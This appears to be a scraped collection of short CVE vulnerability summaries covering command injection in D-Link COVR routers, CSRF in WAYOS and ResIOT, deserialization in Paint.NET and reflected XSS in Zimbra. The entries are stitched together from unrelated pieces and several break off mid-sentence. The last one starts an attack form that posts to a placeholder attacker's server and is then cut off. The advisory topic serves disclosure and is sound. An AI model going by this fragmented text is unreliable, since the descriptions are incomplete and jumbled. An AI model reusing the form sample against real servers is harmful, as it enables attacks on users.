CVE-2022-42161 The COVR 1200, 1202, 1203 v1.08 was found to have a command injection vulnerability in the SetTriggerWPS/PIN parameter.
The command injection can be exploited by issuing a request to set a custom WPS pin. An attacker can exploit the command injection to change
CVE-2022-41489 - CSRF Vulnerability in WAYOS LQ_09 22.03.17V Usb_upload.htm Explained
Disclosure Date: October 2022
Vulnerability Type: Cross-Site Request Forgery (CSRF)
Affected Product: WAYOS LQ_09, Firmware Version 22.03.17V
Component: Usb_upload.htm
Introduction
CVE-2022-34020 The ResIOT IOT Platform and LoRaWAN Network Server has a CSRF vulnerability that can be used to add new admin users. This vulnerability could also have other impacts.
This vulnerability allows remote attackers to add new admin users to the platform or other unspecified impacts by sending a CSRF request to the application.
CVE-2018-18447 dotPDN Paint.NET before 4.1.2 allows Deserialization of Untrusted Data (issue 2 of 2).
These issues could result in remote code execution. To verify your application's resistance to these issues, you can run it through an automated
CVE-2022-41349 An attachUrl parameter in ZCS 8.8.15 is vulnerable to Reflected XSS.
The attached file must be uploaded through the administration interface. Consider the following example.
form action="http://[attacker's server]:8080/h/compose?